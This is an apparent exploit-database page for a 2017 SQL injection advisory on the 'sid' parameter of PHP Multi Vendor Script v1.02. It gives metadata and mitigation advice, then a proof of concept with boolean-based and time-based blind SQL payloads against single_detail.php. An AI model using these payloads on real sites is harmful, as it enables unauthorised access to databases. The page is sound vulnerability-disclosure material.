header-logo
Suggest Exploit
vendor:
PHP Multi Vendor Script
by:
8bitsec
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHP Multi Vendor Script
Affected Version From: 01.02
Affected Version To: 01.02
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux 2.0, Mac OS 10.12.6
2017

PHP Multi Vendor Script v1.02 – ‘sid’ Parameter SQL Injection

The PHP Multi Vendor Script v1.02 is vulnerable to a SQL Injection attack on the 'sid' parameter. An attacker can manipulate the 'sid' parameter to inject malicious SQL queries, potentially gaining unauthorized access to the database and executing arbitrary commands.

Mitigation:

To mitigate this vulnerability, the vendor should implement proper input validation and parameterized queries to prevent SQL Injection attacks. Additionally, users are advised to update to the latest version of the software to protect against this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: PHP Multi Vendor Script v1.02 - 'sid' Parameter SQL Injection
# Date: 2017-09-28
# Exploit Author: 8bitsec
# Vendor Homepage: http://www.dexteritysolution.com/
# Software Link: http://www.dexteritysolution.com/php-multivendor-e-commerce-script.html
# Version: 1.02
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-09-28

Product & Service Introduction:
===============================
In this business world everyone prefers to do online shopping in order to make their shopping easily because it consumes time.

Technical Details & Description:
================================

SQL injection on [sid] parameter.

Proof of Concept (PoC):
=======================

SQLi:

http://localhost/[path]/single_detail.php?sid=15 AND 5068=5068

Parameter: sid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sid=15 AND 5068=5068

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: sid=15 AND SLEEP(5)

==================
8bitsec - [https://twitter.com/_8bitsec]

Navigation

Suggest Exploit

Services By CQR